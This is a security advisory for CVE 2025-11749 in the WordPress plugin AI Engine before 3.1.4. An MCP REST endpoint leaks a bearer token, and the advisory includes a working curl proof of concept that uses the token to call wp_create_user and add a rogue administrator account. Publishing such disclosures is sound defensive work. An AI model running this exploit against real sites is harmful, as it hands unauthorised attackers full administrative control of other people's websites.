AI Engine < 3.1.4 – Unauthenticated Privilege Escalation | CVE 2025-11749

Description

The plugin is vulnerable to Sensitive Information Exposure via the /mcp/v1/ REST API endpoint that exposes the 'Bearer Token' value when 'No-Auth URL' is enabled. This makes it possible for unauthenticated attackers to extract the bearer token, which can be used to gain access to a valid session and perform many actions like creating a new administrator account, leading to privilege escalation.

Proof of Concept

With MCP and the No URL option enabled, as well as the WordPress MCP feature ticked (can be set via the MCP Tab at /wp-admin/admin.php?page=mwai_settings&nekoTab=settings), open https://example.com/wp-json/mcp/v1/ and search for a route with the bearer token, then run

curl -sk "https://example.com/wp-json/mcp/v1/<BEARER_TOKEN>/sse" -X POST -H "Content-Type: application/json" -d '{
  "jsonrpc": "2.0",
  "id": 4,
  "method": "tools/call",
  "params": {
    "name": "wp_create_user",
    "arguments": {
      "user_login": "hacker_admin",
      "user_email": "hacker@evil.com",
      "user_pass": "H4ck3rP@ssw0rd!",
      "display_name": "Malicious Admin",
      "role": "administrator"
    }
  }
}' | python3 -m json.tool